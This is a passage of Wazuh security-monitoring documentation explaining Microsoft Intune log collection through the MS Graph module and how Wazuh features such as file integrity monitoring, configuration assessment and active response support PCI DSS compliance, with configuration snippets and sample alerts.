In the example below, we search for auditEvents, managedDevices, and detectedApps type events within the deviceManagement resource at an interval of 5m. The logs will only be those that were created after the module was started.

Perform the following steps on the Wazuh agent:

  1. Edit the Wazuh agent configuration file /var/ossec/etc/ossec.conf and add the following to enable the Wazuh module for Microsoft Graph with the desired relationships:

    <ossec_config>
      <ms-graph>
        <enabled>yes</enabled>
        <only_future_events>yes</only_future_events>
        <curl_max_size>10M</curl_max_size>
        <run_on_start>yes</run_on_start>
        <interval>5m</interval>
        <version>v1.0</version>
        <api_auth>
          <tenant_id><YOUR_TENANT_ID></tenant_id>
          <client_id><YOUR_CLIENT_ID></client_id>
          <secret_value><YOUR_SECRET_VALUE></secret_value>
          <api_type>global</api_type>
        </api_auth>
        <resource>
          <name>deviceManagement</name>
          <relationship>auditEvents</relationship>
          <relationship>managedDevices</relationship>
          <relationship>detectedApps</relationship>
        </resource>
      </ms-graph>
    </ossec_config>
    

    Replace:

    • <YOUR_TENANT_ID> with the tenant ID of the application registered in Azure.

    • <YOUR_CLIENT_ID> with the client ID of the application registered in Azure.

    • <YOUR_SECRET_VALUE> with the secret associated with the application registered in Azure.

  2. Save the changes and restart the Wazuh agent to effect the changes:

    # systemctl restart wazuh-agent
    

For more configuration details, refer to the ms-graph configuration reference documentation.

Note

To avoid duplicate alerts, this setting should be added to only one Wazuh agent.

Extend the Wazuh ruleset

You can extend the ruleset to customize the hierarchy of detection rules. The Wazuh manager includes a basic ruleset to detect events and inventory items collected by the Wazuh agent. To customize detection rules for Microsoft Intune data, extend the Wazuh ruleset by following the ruleset customization documentation. This allows you to tailor the hierarchy and behavior of detection rules to meet specific requirements.

Note

The Wazuh manager includes a set of inbuilt rules that aid in classifying the importance and context of different events.

The official rules associated with Microsoft Intune are:

<group name="ms-graph,">
  <rule id="99651" level="3">
       <if_sid>99500</if_sid>
       <options>no_full_log</options>
       <field name="ms-graph.resource">deviceManagement</field>
       <description>MS Graph message: MDM Intune event.</description>
   </rule>

   <rule id="99652" level="3">
       <if_sid>99651</if_sid>
       <options>no_full_log</options>
       <field name="ms-graph.relationship">auditEvents</field>
       <description>MS Graph message: MDM Intune audit event.</description>
   </rule>

   <rule id="99653" level="3">
       <if_sid>99651</if_sid>
       <options>no_full_log</options>
       <field name="ms-graph.relationship">managedDevices</field>
       <description>MS Graph message: MDM Intune device.</description>
   </rule>

   <rule id="99654" level="3">
       <if_sid>99651</if_sid>
       <options>no_full_log</options>
       <field name="ms-graph.relationship">detectedApps</field>
       <description>MS Graph message: MDM Intune app.</description>
   </rule>
</group>

The image below shows Microsoft Intune alerts generated on the Wazuh dashboard.

Below, we show sample alerts for some of the relationships we configured previously.

Sample alert for detectedApps:

In the example below, Microsoft Intune detects the application Freeform on one of the managed devices. As a result, the JSON below is generated:

{
  "_index": "wazuh-alerts-4.x-2025.01.21",
  "_id": "m3R0iZQBy8z-qvGHPpVH",
  "_score": null,
  "_source": {
    "input": {
      "type": "log"
    },
    "agent": {
      "ip": "X.X.X.X",
      "name": "Windows-10",
      "id": "001"
    },
    "manager": {
      "name": "wazuh-server"
    },
    "data": {
      "ms-graph": {
        "deviceCount": "1",
        "resource": "deviceManagement",
        "displayName": "Freeform",
        "managedDevices": [
          {
            "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx",
            "deviceName": "xxxxxxxx"
          }
        ],
        "id": "cb7d25a27a1d420817229d272fd27a039b4c330380fc29b2ccc1d3f01e1cfa78",
        "relationship": "detectedApps",
        "version": "2.0",
        "sizeInByte": "0",
        "platform": "macOS"
      },
      "integration": "ms-graph",
      "scan_id": "594315551"
    },
    "rule": {
      "firedtimes": 865,
      "mail": false,
      "level": 3,
      "description": "MS Graph message: MDM Intune app.",
      "groups": [
        "ms-graph"
      ],
      "id": "99654"
    },
    "location": "ms-graph",
    "decoder": {
      "name": "json-msgraph"
    },
    "id": "1737472881.2773328",
    "timestamp": "2025-01-21T15:21:21.941+0000"
  },
  "fields": {
    "timestamp": [
      "2025-01-21T15:21:21.941Z"
    ]
  },
  "sort": [
    1737472881941
  ]
}

Sample alert for managedDevices:

In the example below, Microsoft Intune detects information about a managed device. As a result, the JSON below is generated:

{
  "_index": "wazuh-alerts-4.x-2025.01.21",
  "_id": "ynR3iZQBy8z-qvGHYZae",
  "_score": null,
  "_source": {
    "input": {
      "type": "log"
    },
    "agent": {
      "ip": "X.X.X.X",
      "name": "Windows-10",
      "id": "001"
    },
    "manager": {
      "name": "wazuh-server"
    },
    "data": {
      "ms-graph": {
        "azureADRegistered": "true",
        "deviceRegistrationState": "registered",
        "deviceActionResults": [],
        "easDeviceId": "XXXXXXXXXXXXXXXXXXX",
        "complianceState": "noncompliant",
        "partnerReportedThreatState": "unknown",
        "deviceName": "XXXXXXXXXXXXXXXXXXX",
        "operatingSystem": "Windows",
        "manufacturer": "HP",
        "osVersion": "10.0.22631.4037",
        "lastSyncDateTime": "2024-09-23T18:38:44Z",
        "isEncrypted": "false",
        "exchangeAccessStateReason": "none",
        "totalStorageSpaceInBytes": "478772461568.000000",
        "model": "HP Pavilion Laptop 15-cs0xxx",
        "wiFiMacAddress": "XXXXXXXXXXXXXXXXXXX",
        "id": "XXXXXXXXXXXXXXXXXXX",
        "managedDeviceOwnerType": "company",
        "exchangeLastSuccessfulSyncDateTime": "0001-01-01T00:00:00Z",
        "relationship": "managedDevices",
        "userPrincipalName": "XXXXXXXXXXXXXXXXXXX",
        "easActivationDateTime": "0001-01-01T00:00:00Z",
        "jailBroken": "Unknown",
        "serialNumber": "XXXXXX",
        "resource": "deviceManagement",
        "easActivated": "true",
        "exchangeAccessState": "none",
        "deviceEnrollmentType": "deviceEnrollmentManager",
        "userDisplayName": "Tomás",
        "freeStorageSpaceInBytes": "153643646976.000000",
        "managedDeviceName": "XXXXXXXXXXXXXXXXXXX",
        "userId": "XXXX-XXXX-XXXX-XXXXXXX",
        "managementAgent": "mdm",
        "isSupervised": "false",
        "azureADDeviceId": "XXXX-XXXX-XXXX-XXXXXXX",
        "deviceCategoryDisplayName": "Unknown",
        "physicalMemoryInBytes": "0",
        "managementCertificateExpirationDate": "2025-08-29T20:39:04Z",
        "complianceGracePeriodExpirationDateTime": "2024-10-23T23:52:11Z",
        "enrolledDateTime": "2024-08-30T19:48:53Z"
      },
      "integration": "ms-graph",
      "scan_id": "1365180664"
    },
    "rule": {
      "firedtimes": 6,
      "mail": false,
      "level": 3,
      "description": "MS Graph message: MDM Intune device.",
      "groups": [
        "ms-graph"
      ],
      "id": "99653"
    },
    "location": "ms-graph",
    "decoder": {
      "name": "json-msgraph"
    },
    "id": "1737473086.3097425",
    "timestamp": "2025-01-21T15:24:46.407+0000"
  },
  "fields": {
    "data.ms-graph.exchangeLastSuccessfulSyncDateTime": [
      "0001-01-01T00:00:00.000Z"
    ],
    "timestamp": [
      "2025-01-21T15:24:46.407Z"
    ],
    "data.ms-graph.enrolledDateTime": [
      "2024-08-30T19:48:53.000Z"
    ],
    "data.ms-graph.complianceGracePeriodExpirationDateTime": [
      "2024-10-23T23:52:11.000Z"
    ],
    "data.ms-graph.managementCertificateExpirationDate": [
      "2025-08-29T20:39:04.000Z"
    ],
    "data.ms-graph.lastSyncDateTime": [
      "2024-09-23T18:38:44.000Z"
    ],
    "data.ms-graph.easActivationDateTime": [
      "0001-01-01T00:00:00.000Z"
    ]
  },
  "sort": [
    1737473086407
  ]
}
Import custom dashboards

Import the predefined dashboards to visualize Microsoft Intune alerts in the Wazuh dashboard. These dashboards are not configured out-of-the-box on Wazuh deployments and are provided as separate packages. Perform the following steps to import the Microsoft Intune dashboards:

  1. Download the MS graph Intune events and Intune managed devices and apps dashboards.

  2. Import the downloaded dashboards using the Wazuh dashboard import functionality. Navigate to Dashboard management > Dashboards Management > Saved objects on the Wazuh dashboard. Click Import.

  3. Select one of the downloaded files and click on Import. Repeat this step for the other file.

  4. Access the dashboards from the Saved objects tab. Alternatively, navigate to Explore > Dashboards to view the dashboards.

Dashboard examples

Monitoring GitHub

GitHub is a cloud-based platform that provides version control and collaboration tools for software development projects. It offers an API that enables developers to interact with it programmatically. GitHub provides an audit logging feature that records events as they occur within an organization. Organizations can leverage the audit log to track changes and monitor user activities, therefore enhancing transparency.

This section describes how to monitor GitHub audit logs for your organization. Wazuh can monitor the following GitHub activities:

  • Access to your organization or repository settings.

  • Changes in repository permissions.

  • User addition or removal in an organization, repository, or team.

  • Changes in members privilege.

  • Changes to permissions of a GitHub App.

  • Git events such as cloning, fetching, and pushing.

Monitoring Google Cloud

Google Cloud is a comprehensive suite of cloud computing services provided by Google. It offers various infrastructure and application services, enabling businesses to efficiently deploy, build, and scale applications as needed.

Wazuh offers security monitoring, incident response, and regulatory compliance capabilities that enhance the security posture of your Google Cloud infrastructure. You can install Wazuh agents on your Google Cloud instances or configure Wazuh modules to integrate with supported Google Cloud services. This allows you to analyze events and receive real-time alerts for anomalies within your Google Cloud environment.

Monitoring Office 365

Office 365 is a cloud-based service offered by Microsoft, that provides access to a suite of productivity and collaboration tools, including applications such as Word, Excel, PowerPoint, Outlook, OneDrive, Teams, and SharePoint. Monitoring Office 365 provides visibility and data visualization into actions occurring on its suite of tools.

Regulatory compliance

Wazuh helps implement compliance requirements for regulatory compliance support and visibility. This is done by providing automation, improved security controls, log analysis, and incident response.

The default Wazuh ruleset provides support for PCI DSS, HIPAA, NIST 800-53, TSC, and GDPR frameworks and standards. Wazuh rules and decoders are used to detect attacks, system errors, security misconfigurations, and policy violations.

Learn more about achieving compliance with Wazuh in the sections below:

Using Wazuh for PCI DSS compliance

The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle credit cards. The standard was created to increase controls around cardholder data to reduce credit card fraud.

Wazuh helps ensure PCI DSS compliance by performing log collection, file integrity checking, configuration assessment, intrusion detection, real-time alerting, and active response. The Wazuh dashboard displays information in real-time, allowing filtering by different types of alert fields, including compliance controls. We have also developed a couple of PCI DSS dashboards for convenient viewing of relevant alerts. The syntax used for tagging PCI DSS relevant rules is pci_dss_ followed by the number of the requirement (e.g., pci_dss_10.2.4 and pci_dss_10.2.5).

This guide explains how Wazuh capabilities and modules assist with meeting PCI DSS version 4.0 requirements:

In the following sections, we show some use cases on how to use Wazuh capabilities and modules to meet PCI DSS version 4.0 requirements:

Log data analysis

In many cases, you can find evidence of an attack in the log messages of devices, systems, and applications. The Wazuh log data analysis module receives logs through text files or Windows event logs. It can also directly receive logs via remote syslog, which is useful for firewalls and other such devices.

Additionally, the log data analysis module analyzes the log data received from agents. It performs decoding and rule matching on the received data to process it. You can then use this processed log data for threat detection, prevention, and active response.

The log collector module helps to meet the following PCI DSS requirement:

  • Requirement 10 - Log and Monitor All Access to System Components and Cardholder Data: This control requires that user activities, including those by employees, contractors, consultants, internal and external vendors, and other third parties are logged and monitored, and the log data stored for a specified period of time.

To help meet this requirement, the Wazuh agent collects logs from the endpoints it is deployed on. The log analysis module also receives logs via syslog for network and other syslog-enabled devices. It decodes the logs received to extract relevant information from its fields. After that, it compares the extracted information to the ruleset to look for matches. When the extracted information matches a rule, Wazuh generates an alert. Refer to the ruleset section for more information.

Wazuh also holds logs of events that don't generate an alert. For this it uses its archive feature and the indexer long term storage. For more information on configuring log collection, see the Log data collection section.

Use cases
  • PCI DSS 10.2.2 requires that audit logs record the following details for each auditable event:

    • User identification.

    • Type of event.

    • Date and time.

    • Success and failure indication.

    • Origination of event.

    • Identity or name of affected data, system component, resource, or service (for example, name and protocol).

      The following are some Wazuh rules that help achieve this requirement:

    • Rule 5710 - sshd: attempt to login using a non-existent user: This rule generates an alert when a non-existent user tries to log in to a system via SSH. The generated alert contains the information required by requirement 10.2.2 (user identification, type of event, date and time, success and failure indication, origination of event, and identity or name of affected data, system component, resource, or service). The screenshot below shows the alert generated on the dashboard:

    • Rule 5715 - sshd: authentication success: This rule generates an alert when a user successfully logs into a system via SSH. The generated alert contains the information required by requirement 10.2.2 (user identification, type of event, date and time, success and failure indication, origination of event, and identity or name of affected data, system component, resource, or service). The screenshot below shows the alert generated on the dashboard:

  • PCI DSS 10.5.1 requires that you retain audit log history for at least 12 months, with at least the most recent three months immediately available for analysis. You can achieve this by enabling Wazuh log archives and configuring index management policies. To enable Wazuh log archives, take the following steps:

    Enable archives monitoring in the Wazuh indexer:

    1. Set <logall_json>yes</logall_json> in /var/ossec/etc/ossec.conf.

    2. Set archives: enabled to true in /etc/filebeat/filebeat.yml:

      archives:
      enabled: true
      
    3. Restart Filebeat:

      # systemctl restart filebeat
      
    4. Restart the Wazuh manager:

      # systemctl restart wazuh-manager
      
    5. Select > Dashboard management > Dashboards Management in the Wazuh dashboard.

    6. Choose Index Patterns and select Create index pattern. Use wazuh-archives-* as the index pattern name.

    7. Select timestamp as the primary time field for use with the global time filter, then proceed to create the index pattern.

    8. Open the menu and select Discover under Explore. Events should be getting reported there.

  • PCI DSS requirement 10.4.1 requires to review the following audit logs at least once daily:

    • All security events.

    • Logs of all system components that store, process, or transmit cardholder data (CHD) and/or sensitive authentication data (SAD).

    • Logs of all critical system components.

    • Logs of all servers and system components that perform security functions (for example, network security controls, intrusion-detection systems/intrusion-prevention systems (IDS/IPS), and authentication servers).

    This requirement ensures analyzing logs for indicators of compromise at least once daily. The following are some Wazuh rules that may help in achieving this requirement:

    • Rule 61138: New Windows Service Created. The analysis engine analyzes the Windows system logs to find out if a new service was created generating an alert from this rule.

    • Rule 31168: Shellshock attack detected. The analysis engine analyzes logs to find out about shellshock attacks from a WAF or web application generating an alert.

Configuration assessment

The Security configuration assessment module determines the state of hardening and configuration policies on agents. SCA performs scans to discover exposures or misconfigurations in monitored endpoints. Those scans assess the configuration of the hosts using policy files that contain rules to be tested against the actual configuration of the host.

The SCA module helps to meet the following PCI DSS requirements:

  • Requirement 2 - Apply Secure Configuration to All System Components: This requirement ensures the changing of default passwords, removing unnecessary software, functions, and accounts, and disabling or removing unnecessary services all in order to reduce the potential attack surface.

  • Requirement 8 - Identify Users and Authentication Access to System Components: This requirement ensures that the identification of an individual or process on a computer system is conducted by associating an identity with a person or process through an identifier, such as a user, system, or application ID. These IDs (also referred to as “accounts”) fundamentally establish the identity of an individual or process by assigning unique identification to each person or process to distinguish one user or process from another. When each user or process is uniquely identified, it ensures there is accountability for actions performed by that identity. When such accountability is in place, actions taken are traced to known and authorized users and processes.

To achieve the above requirements, SCA runs assessment checks. These checks assess whether it is necessary to change password related configuration to ensure strong passwords, remove unnecessary software, disable unnecessary services, or audit the TCP/IP stack configuration. Sources of system hardening standards accepted by the industry include, but are not limited to: the Center for Internet Security (CIS), the International Organization for Standardization (ISO), SysAdmin Audit Network Security (SANS), National Institute of Standards Technology (NIST).

Out-of-the-box, Wazuh includes CIS baselines for a wide range of operating systems and applications. This includes Debian, macOS, Red hat, and Windows operating systems. For more information, see a list of the available SCA policies. You can create other baselines for other systems or applications as well. Find more details on configuring SCA checks in the SCA documentation section.

Use cases

Below are some PCI DSS requirement use cases that can be met with the SCA module.

  • PCI DSS 2.2.4 requires enabling only necessary services, protocols, daemons, and functions to remove or disable all unnecessary functionality. IP forwarding is an example of a system service that may be abused if misconfigured. When IP forwarding is configured on a device, it may serve as a router to be abused.

    In order to perform checks for this specific use case, the SCA module has check 18579 Ensure IP forwarding is disabled for Ubuntu 18.04 endpoints. When an SCA scan runs, you can detect if this use case is satisfied.

    Note that the SCA check IDs for the same requirement may vary depending on the endpoint the SCA scan is being run on.

  • PCI DSS 8.3.7 states that individuals are not allowed to submit a new password/passphrase that is the same as any of the last four passwords/passphrases used.

    We have the SCA check 18674 Ensure password reuse is limited for Ubuntu 18.04 endpoints. It checks the password reuse policy and helps meet requirement 8.3.7. So, when an SCA scan runs, you can detect if the password history policy meets the requirement.

Malware detection

Wazuh offers several capabilities that support malware detection. These detections can be done by:

These malware detection components help meet the following PCI DSS requirement:

  • Requirement 5 - Protect All Systems and Networks from Malicious Software: Malicious software (malware) is software or firmware designed to infiltrate or damage a computer system without the owner's knowledge or consent, with the intent of compromising the confidentiality, integrity, or availability of the owner’s data, applications, or operating system. The goal of this requirement is to protect systems from current and evolving malware threats.

To help meet the above PCI DSS requirement, Wazuh uses a combination of rootcheck, CDB lists, integrations with VirusTotal and YARA, and active response to detect and remove malicious files.

Use cases
  • PCI DSS 5.2.2 requires that the deployed anti-malware solution(s):

    • Detects all known types of malware.

    • Removes, blocks, or contains all known types of malware.

    Detecting a rootkit is a sample case for malware detection. The rootcheck module runs several tests to detect rootkits. One of them checks for files hidden in /dev. The /dev directory should only contain device-specific files such as the primary IDE hard disk (/dev/hda), and the kernel random number generators (/dev/random and /dev/urandom), among others. Any additional files, beyond the expected device-specific files, needs inspection. Many rootkits use /dev as a storage partition to hide files.

    In the following example we have a rootkit on the endpoint that creates hidden files in /lib/udev/rules.d. When the rootcheck scan is run, an alert is generated detecting the hidden files.

File integrity monitoring

File integrity monitoring compares the cryptographic checksum and other attributes of a known file against the checksum and attributes of that file after it has been modified.

First, the Wazuh agent scans the system periodically at a specified interval, then it sends the checksums of the monitored files and registry keys (for Windows systems) to the Wazuh server. The server stores the checksums and looks for modifications by comparing the newly received checksums against the historical checksum values for those files and/or registry keys. An alert is generated if the checksum (or another file attribute) changes. Wazuh also supports near real-time file integrity monitoring.

The file integrity monitoring module is used to meet some sub-requirements of PCI DSS requirement 11 which requires testing the security of systems and networks regularly. This requirement aims to ensure that system components, processes, and bespoke and custom software are tested frequently to ensure security controls continue to reflect a changing environment. Some of the changes in the environment may include the modification and deletion of critical files. This module helps to monitor these file changes and assist in achieving PCI DSS compliance.

Use cases
  • PCI DSS 11.5.2 requires the deployment of a change-detection mechanism (for example, file integrity monitoring tools) to alert personnel of unauthorized modification (including changes, additions, and deletions) of critical system files, configuration files, or content files; and to configure the software to perform critical file comparisons at least weekly.

    In the following sections, we look at configuring Wazuh to do the following:

    • Detect changes in a file

    • Perform critical file comparisons at specified intervals

    • Detect file deletion

Detect changes in a file

For this use case, we configure Wazuh to detect when changes are made to a file in the directory /root/credit_cards and the details of the user that made the changes.

On the agent

  1. Firstly we need to check if the Audit daemon is installed in our system.

    In RedHat based systems, Auditd is commonly installed by default. If it's not installed, we need to install it using the following command:

    # yum install audit
    

    For Debian based systems, use the following:

    # apt install auditd
    
  2. Check the full file path for the file or directory to be monitored. In this case, the module monitors the directory /root/credit_cards for changes:

    # ls -l  /root/credit_cards/
    
    total 4
    -rw-r--r--. 1 root root 14 May 16 14:53 cardholder_data.txt
    
    # cat /root/credit_cards/cardholder_data.txt
    
    User1 = card4
    
  3. Add the following configuration to the syscheck block of the agent configuration file (/var/ossec/etc/ossec.conf). This enables real-time monitoring of the directory. It also ensures that Wazuh generates an alert when a file in the directory is modified. This alert has the details of the user who made the changes on the monitored files and the program name or process used to carry them out:

    <syscheck>
       <directories check_all="yes" whodata="yes">/root/credit_cards</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  5. Execute the following command to check if the Audit rule for monitoring the selected folder is applied:

    auditctl -l | grep wazuh_fim
    

    Check in the command output that the rule was added:

    auditctl -w /root/credit_cards -p wa -k wazuh_fim
    
  6. Edit the file and add new content:

    nano credit_cards/cardholder_data.txt
    

    You can see an alert generated to show that a file in the monitored directory was modified.

    In the alert details, you can see the PCI DSS requirement met, the differences in the file checksum, the file modified, the modification time, the whodata showing the process and user that made the modification, and other details.

Perform critical file comparisons at specified intervals

In this use case, we configure Syscheck to detect when changes have been made to monitored files over specific time intervals and show the differences in the file between the last check and the present check. To illustrate this, in the steps below, we configure syscheck to perform a scan every 1 hour and generate an alert for every file change detected.

Note

  • Syscheck runs scans every 12 hours by default. The scan frequency set is for all monitored files/directories except directories with real-time monitoring enabled.

  • Depending on the number of files/directories configured for scans, and the frequency of syscheck scans, you may observe increased CPU and memory usage. Please use the frequency option carefully.

On the agent

  1. Determine the full file path for the file to be monitored. In this case, we are monitoring the file /root/credit_cards/cardholder_data.txt for changes.

    Note

    Showing the changes made in a file is limited to only text files at this time.

  2. Update the frequency option of the syscheck block in the /var/ossec/etc/ossec.conf agent configuration file. Set a scan interval in seconds. For example, every 3600 seconds:

    <frequency>3600</frequency>
    
  3. Add the following configuration to the syscheck block of the /var/ossec/etc/ossec.conf agent configuration file. This enables monitoring of the file. It also ensures that Wazuh generates an alert with the differences when the file is modified.

    <syscheck>
       <directories check_all="yes" report_changes="yes" >/root/credit_cards/cardholder_data.txt</directories>
    </syscheck>
    

    Note

    If you prefer that the changes are monitored in real-time, you can use the configuration below to monitor the directory where the file is saved and disregard making the frequency modification.

    <syscheck>
       <directories check_all="yes" report_changes="yes" realtime="yes" >/root/credit_cards</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes.

    # systemctl restart wazuh-agent
    
  5. Proceed to modify the file. In this case, we removed some content. An alert is generated on the next Syscheck scan about the modified file.

    In the alert details, you can see the changes made in syscheck.diff, the file modified, the PCI DSS requirement met, the differences in the file checksum, the modification time, and other details.

Detect file deletion

In this scenario, Syscheck detects when a file in a monitored directory is deleted. To illustrate this, in the steps below, Syscheck is configured to monitor the /root/credit_cards/ directory for changes.

On the agent

  1. Determine the full file path for the file or directory to be monitored. In this case, we are monitoring the directory /root/credit_cards.

  2. Add the following configuration to the syscheck block of the /var/ossec/etc/ossec.conf agent configuration file. This enables monitoring of the file. It also ensures that Wazuh generates an alert if the file is deleted.

    <syscheck>
       <directories check_all="yes" realtime="yes" >/root/credit_cards</directories>
    </syscheck>
    
  3. Restart the Wazuh agent to apply the changes.

    # systemctl restart wazuh-agent
    
  4. Delete a file from the directory. For example, cardholder_data.txt. You can see an alert generated for the file deleted.

    In the alert details, you can see the file deleted, the PCI DSS requirement met, the deletion time, and other details.

    You can track these activities from the PCI DSS module dashboard. The dashboard shows all activities that trigger a PCI DSS requirement including FIM changes.

Vulnerability detection

Wazuh is able to detect vulnerabilities in the applications installed on agents using the Vulnerability Detection module. This software audit is performed by querying our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and the vulnerabilities repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability detection module correlates this information with data from the endpoint application inventory.

The vulnerability detection module helps to meet the following PCI DSS requirements:

  • Requirement 6 - Develop and Maintain Secure Systems and Software: Actors with bad intentions can use security vulnerabilities to gain privileged access to systems. Many of these vulnerabilities are fixed by vendor-provided security patches, which must be installed by the entities that manage the systems. All system components must have all appropriate software patches to protect against the exploitation and compromise of account data by malicious individuals and malicious software.

The goal of this requirement is to ensure that systems and software have the appropriate security patches for discovered vulnerabilities to prevent compromise.

  • Requirement 11 - Test Security of Systems and Networks Regularly: Vulnerabilities are being discovered continually by malicious individuals and researchers, and being introduced by new software. System components, processes, and bespoke and custom software should be tested frequently to ensure security controls continue to reflect a changing environment.

The goal of this requirement is to ensure that systems and networks are regularly tested to confirm their security status. These tests include penetration testing and vulnerability scans.

The Wazuh vulnerability detection module helps to meet the above requirements. The Wazuh agent collects a list of installed applications and OS information and sends it periodically to the manager. The Wazuh manager compares this information with vulnerability content documents to determine what vulnerabilities exist on an endpoint. You can find more details on configuring vulnerability detection in the vulnerability detection section of the documentation.

Use cases

Below are some PCI DSS requirements use cases that can be met with the vulnerability detection module:

  • PCI DSS 6.3 requires to identify and address security vulnerabilities. While vulnerability detection is enabled by default, you can still check everything is properly configured. For example, you can add the following block to the shared agent configuration file /var/ossec/etc/shared/default/agent.conf to make sure to detect vulnerabilities in packages installed on Ubuntu 20.04 endpoints.

    <wodle name="syscollector">
       <disabled>no</disabled>
       <interval>1h</interval>
       <packages>yes</packages>
    </wodle>
    

    Make sure vulnerability detection is enabled by checking the /var/ossec/etc/ossec.conf manager configuration file.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    

    If you made changes, restart the manager to apply them.

    # systemctl restart wazuh-manager
    

    You can see the results on the Wazuh dashboard. They include details of vulnerable packages, for example, vulnerabilities in the vim application. When you select a specific vulnerability detected, the Wazuh dashboard shows an overview of the issue and its status on the agent.

  • PCI DSS 11.3 requires to identify, prioritize, and address external and internal vulnerabilities regularly. The Wazuh vulnerability detection gives details on the severity rating and the CVSS scores. This helps to prioritize the vulnerabilities. From the vulnerability detection dashboard, you can filter by vulnerability severity rating to prioritize its remediation.

Active Response

Active Response allows the execution of scripts whenever an event matches certain rules in your Wazuh ruleset. The actions executed could be a firewall block or drop, traffic shaping or throttling, or account lockout, among others.

The Active Response module helps to meet the following PCI DSS requirement:

  • Requirement 11 - Test Security of Systems and Networks Regularly: Vulnerabilities are being discovered continually by malicious individuals and researchers, and being introduced by new software. System components, processes, and bespoke and custom software should be tested frequently to ensure security controls continue to reflect a changing environment.

This requirement aims to ensure that you test your systems and networks regularly. Testing allows you to detect and respond to security status and possible intrusions. With the Active Response module, you can respond to intrusions and unauthorized file changes. You can find more details on configuring the Active Response module in the Active Response documentation section.

Use cases
  • PCI DSS 11.5 requires that you detect and respond to network intrusions and unexpected file changes. You can configure scripts to run when specific actions occur to respond to these intrusions. Wazuh comes with preconfigured active response scripts. Refer to the Default Active response scripts section to access these scripts.

    Using the steps below, we configure the Active Response module to execute an IP block when an attempt to log in with a non-existent user via SSH occurs.

    1. Configure the Active Response to execute the firewall-drop command when the rule for attempts to log in to a non-existent user is triggered (rule 5710) by adding the following block in the manager configuration file (/var/ossec/etc/ossec.conf):

      <active-response>
         <disabled>no</disabled>
         <command>firewall-drop</command>
         <location>local</location>
         <rules_id>5710</rules_id>
         <timeout>100</timeout>
      </active-response>
      

      Note

      The firewall-drop command is included in the manager configuration file by default.

    2. Restart the Wazuh manager to apply the configuration:

      # systemctl restart wazuh-manager
      

      When we attempt to SSH with a non-existent user, rule 5710 generates an alert followed by the active response getting triggered.

System inventory

Wazuh uses the Syscollector module to gather information about a monitored endpoint. This information includes hardware details, OS information, network details, services, browser extensions, running processes, users, and groups. The agent runs periodic scans on the endpoint and sends the information to the manager. The manager then updates the appropriate system information. See the System inventory section for more information about the Wazuh Syscollector module.

The Wazuh Syscollector module helps to meet the following PCI DSS requirement:

  • Requirement 2 - Apply Secure Configuration to All System Components: Malicious individuals, both external and internal to an entity, often use default passwords and other vendor default settings to compromise systems. These passwords and settings are well known and are easily determined via public information. Applying secure configurations to system components reduces the means available to an attacker to compromise the system. Changing default passwords, removing unnecessary software, functions, and accounts, and disabling or removing unnecessary services all help to reduce the potential attack surface.

The Wazuh Syscollector module helps to achieve some of the objectives of this requirement. It keeps an inventory of all endpoints and the processes/daemons running on them. The Wazuh Syscollector module also gets information about the endpoint hardware, OS, network details, services, browser extensions, users, and groups. This allows visibility into the PCI DSS relevant assets, enabled network ports, and running processes/daemons, to individuals in an organization.

Use cases

PCI DSS 2.2.4 requires keeping only necessary services, protocols, daemons, and functions enabled and removing or disabling all unnecessary functionality. Using the Wazuh Syscollector module, you can see what processes are running on a specific endpoint and determine if the running process or protocol is necessary for the operation of the asset. You can find this information in the IT Hygiene section on the Wazuh dashboard.

The Wazuh Syscollector module is enabled with all available scans by default in all compatible systems.

Visualization and dashboard

Wazuh provides a web dashboard for data visualization and analysis. The dashboard comes with out-of-the-box modules for threat hunting, PCI DSS compliance, detected vulnerable applications, file integrity monitoring data, configuration assessment results, cloud infrastructure monitoring events, and others. You can perform forensic and historical analysis of your alerts with the Wazuh dashboard.

Wazuh also provides a PCI DSS compliance dashboard under SECURITY OPERATIONS.

Thanks to the PCI DSS compliance dashboard, it's possible to monitor and track events that trigger PCI DSS requirements. This dashboard offers a quick view of the PCI DSS controls and visualizations of related events and requirements.

The Wazuh dashboard allows meeting the following PCI DSS requirements:

  • Requirement 10 - Log and Monitor All Access to System Components and Cardholder Data: This control requires that user activities, including those by employees, contractors, consultants, internal and external vendors, and other third parties are logged, monitored, and any generated alerts are reviewed periodically.

The Visualization and dashboard module helps to meet this requirement by showing events, alerts, configuration assessment results, and other information relevant to achieving PCI DSS compliance.

Use cases
  • PCI DSS 10.4 requires that audit logs are reviewed to identify anomalies or suspicious activity. Using the Wazuh dashboard component, you can review events and alerts generated by suspicious activities.

Using Wazuh for GDPR compliance

The European Union's General Data Protection Regulation (GDPR) was created to reach an agreement on data privacy legislation across Europe. Its primary focus is protecting the data of European Union citizens. The regulation aims to improve user data privacy and reform how European Union organizations approach data privacy.

Wazuh assists with GDPR compliance by performing log collection, file integrity monitoring, configuration assessment, intrusion detection, real-time alerting, and incident response.

Wazuh includes default rules and decoders for detecting various attacks, system errors, security misconfigurations, and policy violations. By default, these rules are mapped to the associated GDPR requirements. It’s possible to map your custom rules to one or more GDPR requirements by adding the compliance identifier in the <group> tag of the rule. The syntax to map a rule to a GDPR requirement is gdpr_ followed by the chapter, the article, and, if applicable, the section and paragraph to which the requirement belongs. For example, gdpr_II_5.1.f. Refer to the ruleset section for more information.

The Wazuh for GDPR white paper (PDF) guide explains how Wazuh modules assist with GDPR compliance. This document doesn’t cover the GDPR formal requirements because it’s outside of its technical scope.

You can find the technical requirements that Wazuh supports in the following sections:

GDPR II, Principles <gdpr_II>

This chapter describes requirements concerning the basic principles of GDPR for processing personal data.

